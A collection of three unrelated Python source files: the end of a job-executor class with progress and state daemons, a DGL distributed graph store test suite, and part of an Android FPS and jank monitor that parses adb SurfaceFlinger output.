job_operation = Thread(target=self._handle_job_operations)
job_operation.daemon = True
job_operation.start()
@keeprunning()
def _progress(self):
"""
Responsible for getting progress on your job
"""
# FIXME: hardcoding
# FIXME: progress.txt appended with job_id
progress = os.path.join(
self.remote_work_dir, "progress.txt" + repr(self.job_id)
)
if os.path.exists(progress):
progress_f = open(progress)
self._get_progress_update(progress_f)
progress_f.close()
# self.log.info("removing progress file", job_state=self.job_state, state=self.state)
if self.state == self.WREADY or self.job_state == "cancelled":
os.remove(progress)
def _get_progress_update(self, f):
"""
If your job shows a progress it needs to be parsed.
>>> try:
... e._get_progress_update()
... except:
... print('Filepointer Required')
...
Filepointer Required
"""
prev_update = None
while self.state != self.WREADY:
update = f.readline()
# self.log.info("insidie _get_progress_update", state=self.state, update=update)
if not update:
if prev_update:
self.log.info("progress_update", cur_update=prev_update)
cur_update = prev_update
self._update_progress(cur_update)
prev_update = None
continue
prev_update = update.strip()
def _update_progress(self, progress):
"""
After progress is parsed it needs to be sent to the master machine.
"""
self.master.worker.update_progress(job_id=self.job_id, progress=progress)
def _make_tmpdir(self, p, job_id):
"""
If your job request uses a temporary directory for spitting out
temporary files, these will be stored locally to executor machine.
>>> import random
>>> random.seed(1)
>>> from executor import Executor
>>> e = Executor()
>>> params = {'arguments': 'arguments',
... 'docker_cred': '',
... 'docker_inp_dir': 'internal_input/',
... 'docker_out_dir': 'internal_output/',
... 'docker_work_dir': 'internal_workdir/',
... 'environment': {},
... 'image_name': 'image',
... 'job_id': 'id',
... 'job_name': 'job_name',
... 'preserve': 'preserve',
... 'remote_inp_dir': 'external_input/',
... 'remote_out_dir': 'external_output/',
... 'remote_work_dir': 'external_workdir/'}
>>> params = AttrDict(params)
>>> job_id = random.randint(0, 9)
>>> tmp_dir = e._make_tmpdir(params, job_id)
>>> tmp_dir
'external_workdir/2job_name'
>>> # Doctest end, clearing noise
>>> shutil.rmtree(params.remote_work_dir)
>>> shutil.rmtree(params.remote_out_dir)
>>> os.path.exists(params.remote_out_dir)
False
>>> os.path.exists(params.remote_work_dir)
False
"""
tmp_path = os.path.join(p.remote_work_dir + repr(job_id) + p.job_name)
if not os.path.exists(tmp_path):
os.makedirs(tmp_path)
return tmp_path
def _preserve_tmp_data(self, preserve, tmp_dir, out_dir):
"""
As part of the job parameters you need to provide a boolean value,
which will determine to conserve temporary files spitted out during
job execution or not, True will result in preserving them in your
output directory else they will be vanished forever.
>>> from executor import Executor
>>> e = Executor()
>>> tmp_dir = 'temporary_dir/'
>>> out_dir = 'output_dir/'
>>> os.mkdir(tmp_dir)
>>> os.path.exists(tmp_dir)
True
>>> os.mkdir(out_dir)
>>> os.path.exists(out_dir)
True
>>> preserve = True
>>> e._preserve_tmp_data(preserve, tmp_dir, out_dir)
>>> os.path.exists(tmp_dir)
False
>>> os.path.exists(out_dir)
True
>>> os.path.exists(out_dir + tmp_dir)
True
>>> os.listdir(out_dir)
['temporary_dir']
>>> # Doctest done, cleaning noise
...
>>> shutil.rmtree(out_dir)
>>> os.path.exists(out_dir)
False
>>> os.path.exists(tmp_dir)
False
>>> preserve = False
>>> os.mkdir(tmp_dir)
>>> os.mkdir(out_dir)
>>> e._preserve_tmp_data(preserve, tmp_dir, out_dir)
>>> os.path.exists(tmp_dir)
False
>>> os.path.exists(out_dir)
True
>>> os.path.exists(out_dir + tmp_dir)
False
>>> os.listdir(out_dir)
[]
>>> # Doctest done, cleaning noise
...
>>> shutil.rmtree(out_dir)
>>> os.path.exists(out_dir)
False
>>>
"""
if not preserve:
try:
shutil.rmtree(tmp_dir)
except:
# FIXME: add no file exception
pass
else:
shutil.move(tmp_dir, out_dir)
@keeprunning()
def update_state(self):
"""
Responsible for sending the executor state to master machine,
irrespective of job being executed or not.
"""
self.master.worker.update_state(job_id=self.job_id, state=self.state)
def _state_daemon(self):
"""
A daemon thread is required to send the state of the executor.
The state of the executor will change from being ready to busy
depending on if its executing a job or not.
>>> from executor import Executor
>>> e = Executor()
>>> th = e._state_daemon()
>>> th.isDaemon()
True
>>> th.is_alive()
True
"""
state = Thread(target=self.update_state)
state.daemon = True
state.start()
return state
def _progress_daemon(self):
"""
As the job is executing if the docker image supports getting
progress as its executing, this thread will be responsible to
send the progress to the master machine on a regular basis.
>>> from executor import Executor
>>> e = Executor()
>>> th = e._progress_daemon()
>>> th.isDaemon()
True
>>> th.is_alive()
True
"""
progress = Thread(target=self._progress)
progress.daemon = True
progress.start()
return progress
|
test_dist_graph_store.py
|
import os
os.environ['OMP_NUM_THREADS'] = '1'
import dgl
import sys
import numpy as np
import time
import socket
from scipy import sparse as spsp
from numpy.testing import assert_array_equal
from multiprocessing import Process, Manager, Condition, Value
import multiprocessing as mp
from dgl.heterograph_index import create_unitgraph_from_coo
from dgl.data.utils import load_graphs, save_graphs
from dgl.distributed import DistGraphServer, DistGraph
from dgl.distributed import partition_graph, load_partition, load_partition_book, node_split, edge_split
from dgl.distributed import SparseAdagrad, DistEmbedding
from numpy.testing import assert_almost_equal
import backend as F
import math
import unittest
import pickle
if os.name != 'nt':
import fcntl
import struct
def get_local_usable_addr():
"""Get local usable IP and port
Returns
-------
str
IP address, e.g., '192.168.8.12:50051'
"""
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
try:
# doesn't even have to be reachable
sock.connect(('10.255.255.255', 1))
ip_addr = sock.getsockname()[0]
except ValueError:
ip_addr = '127.0.0.1'
finally:
sock.close()
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.bind(("", 0))
sock.listen(1)
port = sock.getsockname()[1]
sock.close()
return ip_addr + ' ' + str(port)
def create_random_graph(n):
arr = (spsp.random(n, n, density=0.001, format='coo', random_state=100) != 0).astype(np.int64)
return dgl.graph(arr)
def run_server(graph_name, server_id, num_clients, shared_mem):
g = DistGraphServer(server_id, "kv_ip_config.txt", num_clients,
'/tmp/dist_graph/{}.json'.format(graph_name),
disable_shared_mem=not shared_mem)
print('start server', server_id)
g.start()
def emb_init(shape, dtype):
return F.zeros(shape, dtype, F.cpu())
def rand_init(shape, dtype):
return F.tensor(np.random.normal(size=shape), F.float32)
def run_client(graph_name, part_id, num_clients, num_nodes, num_edges):
time.sleep(5)
gpb, graph_name = load_partition_book('/tmp/dist_graph/{}.json'.format(graph_name),
part_id, None)
g = DistGraph("kv_ip_config.txt", graph_name, gpb=gpb)
check_dist_graph(g, num_clients, num_nodes, num_edges)
def check_dist_graph(g, num_clients, num_nodes, num_edges):
# Test API
assert g.number_of_nodes() == num_nodes
assert g.number_of_edges() == num_edges
# Test reading node data
nids = F.arange(0, int(g.number_of_nodes() / 2))
feats1 = g.ndata['features'][nids]
feats = F.squeeze(feats1, 1)
assert np.all(F.asnumpy(feats == nids))
# Test reading edge data
eids = F.arange(0, int(g.number_of_edges() / 2))
feats1 = g.edata['features'][eids]
feats = F.squeeze(feats1, 1)
assert np.all(F.asnumpy(feats == eids))
# Test init node data
new_shape = (g.number_of_nodes(), 2)
g.ndata['test1'] = dgl.distributed.DistTensor(g, new_shape, F.int32)
feats = g.ndata['test1'][nids]
assert np.all(F.asnumpy(feats) == 0)
# reference to a one that exists
test2 = dgl.distributed.DistTensor(g, new_shape, F.float32, 'test2', init_func=rand_init)
test3 = dgl.distributed.DistTensor(g, new_shape, F.float32, 'test2')
assert np.all(F.asnumpy(test2[nids]) == F.asnumpy(test3[nids]))
# create a tensor and destroy a tensor and create it again.
test3 = dgl.distributed.DistTensor(g, new_shape, F.float32, 'test3', init_func=rand_init)
del test3
test3 = dgl.distributed.DistTensor(g, (g.number_of_nodes(), 3), F.float32, 'test3')
del test3
# test a persistent tesnor
test4 = dgl.distributed.DistTensor(g, new_shape, F.float32, 'test4', init_func=rand_init,
persistent=True)
del test4
try:
test4 = dgl.distributed.DistTensor(g, (g.number_of_nodes(), 3), F.float32, 'test4')
raise Exception('')
except:
pass
# Test sparse emb
try:
emb = DistEmbedding(g, g.number_of_nodes(), 1, 'emb1', emb_init)
lr = 0.001
optimizer = SparseAdagrad([emb], lr=lr)
with F.record_grad():
feats = emb(nids)
assert np.all(F.asnumpy(feats) == np.zeros((len(nids), 1)))
loss = F.sum(feats + 1, 0)
loss.backward()
optimizer.step()
feats = emb(nids)
if num_clients == 1:
assert_almost_equal(F.asnumpy(feats), np.ones((len(nids), 1)) * -lr)
rest = np.setdiff1d(np.arange(g.number_of_nodes()), F.asnumpy(nids))
feats1 = emb(rest)
assert np.all(F.asnumpy(feats1) == np.zeros((len(rest), 1)))
policy = dgl.distributed.PartitionPolicy('node', g.get_partition_book())
grad_sum = dgl.distributed.DistTensor(g, (g.number_of_nodes(),), F.float32,
'emb1_sum', policy)
assert np.all(F.asnumpy(grad_sum[nids]) == np.ones((len(nids), 1)) * num_clients)
assert np.all(F.asnumpy(grad_sum[rest]) == np.zeros((len(rest), 1)))
emb = DistEmbedding(g, g.number_of_nodes(), 1, 'emb2', emb_init)
with F.no_grad():
feats1 = emb(nids)
assert np.all(F.asnumpy(feats1) == 0)
optimizer = SparseAdagrad([emb], lr=lr)
with F.record_grad():
feats1 = emb(nids)
feats2 = emb(nids)
feats = F.cat([feats1, feats2], 0)
assert np.all(F.asnumpy(feats) == np.zeros((len(nids) * 2, 1)))
loss = F.sum(feats + 1, 0)
loss.backward()
optimizer.step()
with F.no_grad():
feats = emb(nids)
if num_clients == 1:
assert_almost_equal(F.asnumpy(feats), np.ones((len(nids), 1)) * math.sqrt(2) * -lr)
rest = np.setdiff1d(np.arange(g.number_of_nodes()), F.asnumpy(nids))
feats1 = emb(rest)
assert np.all(F.asnumpy(feats1) == np.zeros((len(rest), 1)))
except NotImplementedError as e:
pass
# Test write data
new_feats = F.ones((len(nids), 2), F.int32, F.cpu())
g.ndata['test1'][nids] = new_feats
feats = g.ndata['test1'][nids]
assert np.all(F.asnumpy(feats) == 1)
# Test metadata operations.
assert len(g.ndata['features']) == g.number_of_nodes()
assert g.ndata['features'].shape == (g.number_of_nodes(), 1)
assert g.ndata['features'].dtype == F.int64
assert g.node_attr_schemes()['features'].dtype == F.int64
assert g.node_attr_schemes()['test1'].dtype == F.int32
assert g.node_attr_schemes()['features'].shape == (1,)
selected_nodes = np.random.randint(0, 100, size=g.number_of_nodes()) > 30
# Test node split
nodes = node_split(selected_nodes, g.get_partition_book())
nodes = F.asnumpy(nodes)
# We only have one partition, so the local nodes are basically all nodes in the graph.
local_nids = np.arange(g.number_of_nodes())
for n in nodes:
assert n in local_nids
print('end')
def check_server_client(shared_mem, num_servers, num_clients):
prepare_dist(num_servers)
g = create_random_graph(10000)
# Partition the graph
num_parts = 1
graph_name = 'dist_graph_test_2'
g.ndata['features'] = F.unsqueeze(F.arange(0, g.number_of_nodes()), 1)
g.edata['features'] = F.unsqueeze(F.arange(0, g.number_of_edges()), 1)
partition_graph(g, graph_name, num_parts, '/tmp/dist_graph')
# let's just test on one partition for now.
# We cannot run multiple servers and clients on the same machine.
serv_ps = []
ctx = mp.get_context('spawn')
for serv_id in range(num_servers):
p = ctx.Process(target=run_server, args=(graph_name, serv_id,
num_clients, shared_mem))
serv_ps.append(p)
p.start()
cli_ps = []
for cli_id in range(num_clients):
print('start client', cli_id)
p = ctx.Process(target=run_client, args=(graph_name, 0, num_clients, g.number_of_nodes(),
g.number_of_edges()))
p.start()
cli_ps.append(p)
for p in cli_ps:
p.join()
for p in serv_ps:
p.join()
print('clients have terminated')
@unittest.skipIf(dgl.backend.backend_name == "tensorflow", reason="TF doesn't support some of operations in DistGraph")
def test_server_client():
os.environ['DGL_DIST_MODE'] = 'distributed'
check_server_client(True, 1, 1)
check_server_client(False, 1, 1)
check_server_client(True, 2, 2)
check_server_client(False, 2, 2)
@unittest.skipIf(dgl.backend.backend_name == "tensorflow", reason="TF doesn't support some of operations in DistGraph")
def test_standalone():
os.environ['DGL_DIST_MODE'] = 'standalone'
g = create_random_graph(10000)
# Partition the graph
num_parts = 1
graph_name = 'dist_graph_test_3'
g.ndata['features'] = F.unsqueeze(F.arange(0, g.number_of_nodes()), 1)
g.edata['features'] = F.unsqueeze(F.arange(0, g.number_of_edges()), 1)
partition_graph(g, graph_name, num_parts, '/tmp/dist_graph')
dist_g = DistGraph("kv_ip_config.txt", graph_name,
part_config='/tmp/dist_graph/{}.json'.format(graph_name))
check_dist_graph(dist_g, 1, g.number_of_nodes(), g.number_of_edges())
def test_split():
#prepare_dist()
g = create_random_graph(10000)
num_parts = 4
num_hops = 2
partition_graph(g, 'dist_graph_test', num_parts, '/tmp/dist_graph', num_hops=num_hops, part_method='metis')
node_mask = np.random.randint(0, 100, size=g.number_of_nodes()) > 30
edge_mask = np.random.randint(0, 100, size=g.number_of_edges()) > 30
selected_nodes = np.nonzero(node_mask)[0]
selected_edges = np.nonzero(edge_mask)[0]
for i in range(num_parts):
dgl.distributed.set_num_client(num_parts)
part_g, node_feats, edge_feats, gpb, _ = load_partition('/tmp/dist_graph/dist_graph_test.json', i)
local_nids = F.nonzero_1d(part_g.ndata['inner_node'])
local_nids = F.gather_row(part_g.ndata[dgl.NID], local_nids)
nodes1 = np.intersect1d(selected_nodes, F.asnumpy(local_nids))
nodes2 = node_split(node_mask, gpb, i, force_even=False)
assert np.all(np.sort(nodes1) == np.sort(F.asnumpy(nodes2)))
local_nids = F.asnumpy(local_nids)
for n in nodes1:
assert n in local_nids
dgl.distributed.set_num_client(num_parts * 2)
nodes3 = node_split(node_mask, gpb, i * 2, force_even=False)
nodes4 = node_split(node_mask, gpb, i * 2 + 1, force_even=False)
nodes5 = F.cat([nodes3, nodes4], 0)
assert np.all(np.sort(nodes1) == np.sort(F.asnumpy(nodes5)))
dgl.distributed.set_num_client(num_parts)
local_eids = F.nonzero_1d(part_g.edata['inner_edge'])
local_eids = F.gather_row(part_g.edata[dgl.EID], local_eids)
edges1 = np.intersect1d(selected_edges, F.asnumpy(local_eids))
edges2 = edge_split(edge_mask, gpb, i, force_even=False)
assert np.all(np.sort(edges1) == np.sort(F.asnumpy(edges2)))
local_eids = F.asnumpy(local_eids)
for e in edges1:
assert e in local_eids
dgl.distributed.set_num_client(num_parts * 2)
edges3 = edge_split(edge_mask, gpb, i * 2, force_even=False)
edges4 = edge_split(edge_mask, gpb, i * 2 + 1, force_even=False)
edges5 = F.cat([edges3, edges4], 0)
assert np.all(np.sort(edges1) == np.sort(F.asnumpy(edges5)))
def test_split_even():
#prepare_dist(1)
g = create_random_graph(10000)
num_parts = 4
num_hops = 2
partition_graph(g, 'dist_graph_test', num_parts, '/tmp/dist_graph', num_hops=num_hops, part_method='metis')
node_mask = np.random.randint(0, 100, size=g.number_of_nodes()) > 30
edge_mask = np.random.randint(0, 100, size=g.number_of_edges()) > 30
selected_nodes = np.nonzero(node_mask)[0]
selected_edges = np.nonzero(edge_mask)[0]
all_nodes1 = []
all_nodes2 = []
all_edges1 = []
all_edges2 = []
for i in range(num_parts):
dgl.distributed.set_num_client(num_parts)
part_g, node_feats, edge_feats, gpb, _ = load_partition('/tmp/dist_graph/dist_graph_test.json', i)
local_nids = F.nonzero_1d(part_g.ndata['inner_node'])
local_nids = F.gather_row(part_g.ndata[dgl.NID], local_nids)
nodes = node_split(node_mask, gpb, i, force_even=True)
all_nodes1.append(nodes)
subset = np.intersect1d(F.asnumpy(nodes), F.asnumpy(local_nids))
print('part {} get {} nodes and {} are in the partition'.format(i, len(nodes), len(subset)))
dgl.distributed.set_num_client(num_parts * 2)
nodes1 = node_split(node_mask, gpb, i * 2, force_even=True)
nodes2 = node_split(node_mask, gpb, i * 2 + 1, force_even=True)
nodes3 = F.cat([nodes1, nodes2], 0)
all_nodes2.append(nodes3)
subset = np.intersect1d(F.asnumpy(nodes), F.asnumpy(nodes3))
print('intersection has', len(subset))
dgl.distributed.set_num_client(num_parts)
local_eids = F.nonzero_1d(part_g.edata['inner_edge'])
local_eids = F.gather_row(part_g.edata[dgl.EID], local_eids)
edges = edge_split(edge_mask, gpb, i, force_even=True)
all_edges1.append(edges)
subset = np.intersect1d(F.asnumpy(edges), F.asnumpy(local_eids))
print('part {} get {} edges and {} are in the partition'.format(i, len(edges), len(subset)))
dgl.distributed.set_num_client(num_parts * 2)
edges1 = edge_split(edge_mask, gpb, i * 2, force_even=True)
edges2 = edge_split(edge_mask, gpb, i * 2 + 1, force_even=True)
edges3 = F.cat([edges1, edges2], 0)
all_edges2.append(edges3)
subset = np.intersect1d(F.asnumpy(edges), F.asnumpy(edges3))
print('intersection has', len(subset))
all_nodes1 = F.cat(all_nodes1, 0)
all_edges1 = F.cat(all_edges1, 0)
all_nodes2 = F.cat(all_nodes2, 0)
all_edges2 = F.cat(all_edges2, 0)
all_nodes = np.nonzero(node_mask)[0]
all_edges = np.nonzero(edge_mask)[0]
assert np.all(all_nodes == F.asnumpy(all_nodes1))
assert np.all(all_edges == F.asnumpy(all_edges1))
assert np.all(all_nodes == F.asnumpy(all_nodes2))
assert np.all(all_edges == F.asnumpy(all_edges2))
def prepare_dist(num_servers):
ip_config = open("kv_ip_config.txt", "w")
ip_addr = get_local_usable_addr()
ip_config.write('{} {}\n'.format(ip_addr, num_servers))
ip_config.close()
if __name__ == '__main__':
os.makedirs('/tmp/dist_graph', exist_ok=True)
test_split()
test_split_even()
test_server_client()
test_standalone()
|
fps.py
|
# -*- coding: utf-8 -*-
'''
@author: look
@copyright: 1999-2020 Alibaba.com. All rights reserved.
@license: Apache Software License 2.0
@contact: 390125133@qq.com
'''
'''FPS监控器
'''
import queue
import datetime
import time
import re
import threading
import os,sys
import copy
import csv
import traceback
BaseDir=os.path.dirname(__file__)
sys.path.append(os.path.join(BaseDir,'../..'))
from mobileperf.common.basemonitor import Monitor
from mobileperf.android.tools.androiddevice import AndroidDevice
from mobileperf.common.log import logger
from mobileperf.common.utils import TimeUtils
from mobileperf.android.globaldata import RuntimeData
class SurfaceStatsCollector(object):
'''Collects surface stats for a SurfaceView from the output of SurfaceFlinger
'''
def __init__(self, device, frequency,package_name,fps_queue,jank_threshold,use_legacy = False):
self.device = device
self.frequency = frequency
self.package_name = package_name
self.jank_threshold = jank_threshold /1000.0 # 内部的时间戳是秒为单位
self.use_legacy_method = use_legacy
self.surface_before = 0
self.last_timestamp = 0
self.data_queue = queue.Queue()
self.stop_event = threading.Event()
self.focus_window = None
# queue 上报线程用
self.fps_queue = fps_queue
def start(self,start_time):
'''打开SurfaceStatsCollector
'''
if not self.use_legacy_method and self._clear_surfaceflinger_latency_data():
try:
self.focus_window = self.get_focus_activity()
# 如果self.focus_window里包含字符'$',必须将其转义
if (self.focus_window.find('$') != -1):
self.focus_window = self.focus_window.replace('$','\$')
except:
logger.warn(u'无法动态获取当前Activity名称,使用page_flip统计全屏帧率!')
self.use_legacy_method = True
self.surface_before = self._get_surface_stats_legacy()
else:
logger.debug("dumpsys SurfaceFlinger --latency-clear is none")
self.use_legacy_method = True
self.surface_before = self._get_surface_stats_legacy()
self.collector_thread = threading.Thread(target=self._collector_thread)
self.collector_thread.start()
self.calculator_thread = threading.Thread(target=self._calculator_thread,args=(start_time,))
self.calculator_thread.start()
def stop(self):
'''结束SurfaceStatsCollector
'''
if self.collector_thread:
self.stop_event.set()
self.collector_thread.join()
self.collector_thread = None
if self.fps_queue:
self.fps_queue.task_done()
def get_focus_activity(self):
'''通过dumpsys window windows获取activity名称 window名?
'''
return self.device.adb.get_focus_activity()
def _calculate_results(self, refresh_period, timestamps):
"""Returns a list of SurfaceStatsCollector.Result.
不少手机第一列 第三列 数字完全相同
"""
frame_count = len(timestamps)
if frame_count ==0:
fps = 0
jank = 0
elif frame_count == 1:
fps = 1
jank = 0
else:
seconds = timestamps[-1][1] - timestamps[0][1]
if seconds > 0:
fps = int(round((frame_count - 1) / seconds))
jank =self._calculate_janky(timestamps)
else:
fps = 1
jank = 0
return fps,jank
def _calculate_results_new(self, refresh_period, timestamps):
"""Returns a list of SurfaceStatsCollector.Result.
不少手机第一列 第三列 数字完全相同
"""
frame_count = len(timestamps)
if frame_count ==0:
fps = 0
jank = 0
elif frame_count == 1:
fps = 1
jank = 0
elif frame_count == 2 or frame_count ==3 or frame_count==4:
seconds = timestamps[-1][1] - timestamps[0][1]
if seconds > 0:
fps = int(round((frame_count - 1) / seconds))
jank = self._calculate_janky(timestamps)
else:
fps = 1
jank = 0
else:
seconds = timestamps[-1][1] - timestamps[0][1]
if seconds > 0:
fps = int(round((frame_count - 1) / seconds))
jank =self._calculate_jankey_new(timestamps)
else:
fps = 1
jank = 0
return fps,jank
def _calculate_jankey_new(self,timestamps):
'''同时满足两个条件计算为一次卡顿:
①Display FrameTime>前三帧平均耗时2倍。
②Display FrameTime>两帧电影帧耗时 (1000ms/24*2≈83.33ms)。
'''
twofilmstamp = 83.3 / 1000.0
tempstamp = 0
# 统计丢帧卡顿
jank = 0
for index,timestamp in enumerate(timestamps):
#前面四帧按超过166ms计算为卡顿
if (index == 0) or (index == 1) or (index == 2) or (index == 3):
if tempstamp == 0:
tempstamp = timestamp[1]
continue
# 绘制帧耗时
costtime = timestamp[1] - tempstamp
# 耗时大于阈值10个时钟周期,用户能感受到卡顿感
if costtime > self.jank_threshold:
jank = jank + 1
tempstamp = timestamp[1]
elif index > 3:
currentstamp = timestamps[index][1]
lastonestamp = timestamps[index - 1][1]
lasttwostamp = timestamps[index - 2][1]
lastthreestamp = timestamps[index - 3][1]
lastfourstamp = timestamps[index - 4][1]
tempframetime = ((lastthreestamp - lastfourstamp) + (lasttwostamp - lastthreestamp) + (
lastonestamp - lasttwostamp)) / 3 * 2
currentframetime = currentstamp - lastonestamp
if (currentframetime > tempframetime) and (currentframetime > twofilmstamp):
jank = jank + 1
return jank
def _calculate_janky(self,timestamps):
tempstamp = 0
#统计丢帧卡顿
jank = 0
for timestamp in timestamps:
if tempstamp == 0:
tempstamp = timestamp[1]
continue
#绘制帧耗时
costtime = timestamp[1] - tempstamp
#耗时大于阈值10个时钟周期,用户能感受到卡顿感
if costtime > self.jank_threshold:
jank = jank + 1
tempstamp = timestamp[1]
return jank
def _calculator_thread(self,start_time):
'''处理surfaceflinger数据
'''
fps_file = os.path.join(RuntimeData.package_save_path, 'fps.csv')
if self.use_legacy_method:
fps_title = ['datetime', 'fps']
else:
fps_title = ['datetime', "activity window", 'fps', 'jank']
try:
with open(fps_file, 'a+') as df:
csv.writer(df, lineterminator='\n').writerow(fps_title)
if self.fps_queue:
fps_file_dic = {'fps_file': fps_file}
self.fps_queue.put(fps_file_dic)
except RuntimeError as e:
logger.exception(e)
while True:
try:
data = self.data_queue.get()
if isinstance(data, str) and data == 'Stop':
break
before = time.time()
if self.use_legacy_method:
td = data['timestamp'] - self.surface_before['timestamp']
seconds = td.seconds + td.microseconds / 1e6
frame_count = (data['page_flip_count'] -
self.surface_before['page_flip_count'])
fps = int(round(frame_count / seconds))
if fps>60:
fps = 60
self.surface_before = data
logger.debug('FPS:%2s'%fps)
tmp_list = [TimeUtils.getCurrentTimeUnderline(),fps]
try:
with open(fps_file, 'a+',encoding="utf-8") as f:
# tmp_list[0] = TimeUtils.formatTimeStamp(tmp_list[0])
csv.writer(f, lineterminator='\n').writerow(tmp_list)
except RuntimeError as e:
logger.exception(e)
else:
refresh_period = data[0]
timestamps = data[1]
collect_time = data[2]
# fps,jank = self._calculate_results(refresh_period, timestamps)
fps, jank = self._calculate_results_new(refresh_period, timestamps)
logger.debug('FPS:%2s Jank:%s'%(fps,jank))
fps_list=[collect_time,self.focus_window,fps,jank]
if self.fps_queue:
self.fps_queue.put(fps_list)
if not self.fps_queue:#为了让单个脚本运行时保存数据
try:
with open(fps_file, 'a+',encoding="utf-8") as f:
tmp_list = copy.deepcopy(fps_list)
tmp_list[0] = TimeUtils.formatTimeStamp(tmp_list[0])
csv.writer(f, lineterminator='\n').writerow(tmp_list)
except RuntimeError as e:
logger.exception(e)
time_consume = time.time() - before
delta_inter = self.frequency - time_consume
if delta_inter > 0:
time.sleep(delta_inter)
except:
logger.error("an exception hanpend in fps _calculator_thread ,reason unkown!")
s = traceback.format_exc()
logger.debug(s)
if self.fps_queue:
self.fps_queue.task_done()
def _collector_thread(self):
'''收集surfaceflinger数据
用了两种方式:use_legacy_method 为ture时,需要root权限:
service call SurfaceFlinger 1013 得到帧数
为false,dumpsys SurfaceFlinger --latency
Android 8.0 dumpsys SurfaceFlinger 没有内容
则用dumpsys gfxinfo package_name framestats
'''
is_first = True
while not self.stop_event.is_set():
try:
before = time.time()
if self.use_legacy_method:
surface_state = self._get_surface_stats_legacy()
if surface_state:
self.data_queue.put(surface_state)
else:
timestamps = []
refresh_period, new_timestamps = self._get_surfaceflinger_frame_data()
if refresh_period is None or new_timestamps is None:
# activity发生变化,旧的activity不存时,取的时间戳为空,
self.focus_window = self.get_focus_activity()
logger.debug("refresh_period is None or timestamps is None")
continue
# 计算不重复的帧
timestamps += [timestamp for timestamp in new_timestamps
if timestamp[1] > self.last_timestamp]
if len(timestamps):
first_timestamp = [[0, self.last_timestamp, 0]]
if not is_first:
timestamps = first_timestamp + timestamps
self.last_timestamp = timestamps[-1][1]
is_first = False
else:
# 两种情况:1)activity发生变化,但旧的activity仍然存时,取的时间戳不为空,但时间全部小于等于last_timestamp
# 2)activity没有发生变化,也没有任何刷新
is_first = True
cur_focus_window = self.get_focus_activity()
if self.focus_window != cur_focus_window:
self.focus_window = cur_focus_window
continue
logger.debug(timestamps)
self.data_queue.put((refresh_period, timestamps,time.time()))
time_consume = time.time() - before
delta_inter = self.frequency - time_consume
if delta_inter > 0:
time.sleep(delta_inter)
except:
logger.error("an exception hanpend in fps _collector_thread , reason unkown!")
s = traceback.format_exc()
logger.debug(s)
if self.fps_queue:
self.fps_queue.task_done()
self.data_queue.put(u'Stop')
def _clear_surfaceflinger_latency_data(self):
"""Clears the SurfaceFlinger latency data.
Returns:
True if SurfaceFlinger latency is supported by the device, otherwise
False.
"""
# The command returns nothing if it is supported, otherwise returns many
# lines of result just like 'dumpsys SurfaceFlinger'.
if self.focus_window == None:
results = self.device.adb.run_shell_cmd(
'dumpsys SurfaceFlinger --latency-clear')
else:
results = self.device.adb.run_shell_cmd(
'dumpsys SurfaceFlinger --latency-clear %s' % self.focus_window)
return not len(results)
def _get_surfaceflinger_frame_data(self):
"""Returns collected SurfaceFlinger frame timing data.
return:(16.6,[[t1,t2,t3],[t4,t5,t6]])
Returns:
A tuple containing:
- The display's nominal refresh period in seconds.
- A list of timestamps signifying frame presentation times in seconds.
The return value may be (None, None) if there was no data collected (for
example, if the app was closed before the collector thread has finished).
"""
# shell dumpsys SurfaceFlinger --latency <window name>
# prints some information about the last 128 frames displayed in
# that window.
# The data returned looks like this:
# 16954612
# 7657467895508 7657482691352 7657493499756
# 7657484466553 7657499645964 7657511077881
# 7657500793457 7657516600576 7657527404785
# (...)
#
# The first line is the refresh period (here 16.95 ms), it is followed
# by 128 lines w/ 3 timestamps in nanosecond each:
# A) when the app started to draw
# B) the vsync immediately preceding SF submitting the frame to the h/w
# C) timestamp immediately after SF submitted that frame to the h/w
#
# The difference between the 1st and 3rd timestamp is the frame-latency.
# An interesting data is when the frame latency crosses a refresh period
# boundary, this can be calculated this way:
#
# ceil((C - A) / refresh-period)
#
# (each time the number above changes, we have a "jank").
# If this happens a lot during an animation, the animation appears
# janky, even if it runs at 60 fps in average.
#
# Google Pixel 2 android8.0 dumpsys SurfaceFlinger --latency结果
# 16666666
# 0 0 0
# 0 0 0
# 0 0 0
# 0 0 0
# 但华为 荣耀9 android8.0 dumpsys SurfaceFlinger --latency结果是正常的 但数据更新很慢 也不能用来计算fps
# 16666666
# 9223372036854775807 3618832932780 9223372036854775807
# 9223372036854775807 3618849592155 9223372036854775807
# 9223372036854775807 3618866251530 9223372036854775807
# Google Pixel 2 Android8.0 dumpsys SurfaceFlinger --latency window 结果
# C:\Users\luke01>adb -s HT7B81A05143 shell dumpsys SurfaceFlinger --latency window_name
# 16666666
refresh_period = None
timestamps = []
nanoseconds_per_second = 1e9
pending_fence_timestamp = (1 << 63) - 1
if self.device.adb.get_sdk_version() >= 26:
results = self.device.adb.run_shell_cmd(
'dumpsys SurfaceFlinger --latency %s'%self.focus_window)
results = results.replace("\r\n","\n").splitlines()
refresh_period = int(results[0]) / nanoseconds_per_second
results = self.device.adb.run_shell_cmd('dumpsys gfxinfo %s framestats'%self.package_name)
# logger.debug(results)
# 把dumpsys gfxinfo package_name framestats的结果封装成 dumpsys SurfaceFlinger --latency的结果
# 方便后面计算fps jank统一处理
results = results.replace("\r\n","\n").splitlines()
if not len(results):
return (None, None)
isHaveFoundWindow = False
PROFILEDATA_line = 0
for line in results:
if not isHaveFoundWindow:
if "Window" in line and self.focus_window in line:
isHaveFoundWindow = True
# logger.debug("Window line:"+line)
if not isHaveFoundWindow:
continue
if "PROFILEDATA" in line:
PROFILEDATA_line +=1
fields = []
fields = line.split(",")
if fields and '0' == fields[0]:
# logger.debug(line)
# 获取INTENDED_VSYNC VSYNC FRAME_COMPLETED时间 利用VSYNC计算fps jank
timestamp = [int(fields[1]),int(fields[2]),int(fields[13])]
if timestamp[1] == pending_fence_timestamp:
continue
timestamp = [_timestamp / nanoseconds_per_second for _timestamp in timestamp]
timestamps.append(timestamp)
# 如果到了下一个窗口,退出
if 2 == PROFILEDATA_line:
break
else:
results = self.device.adb.run_shell_cmd(
'dumpsys SurfaceFlinger --latency %s'%self.focus_window)
results = results.replace("\r\n","\n").splitlines()
logger.debug("dumpsys SurfaceFlinger --latency result:")
logger.debug(results)
if not len(results):
return (None, None)
if not results[0].isdigit():
return (None, None)
try:
refresh_period = int(results[0]) / nanoseconds_per_second
except Exception as e:
logger.exception(e)
return (None, None)
# If a fence associated with a frame is still pending when we query the
# latency data, SurfaceFlinger gives the frame a timestamp of INT64_MAX.
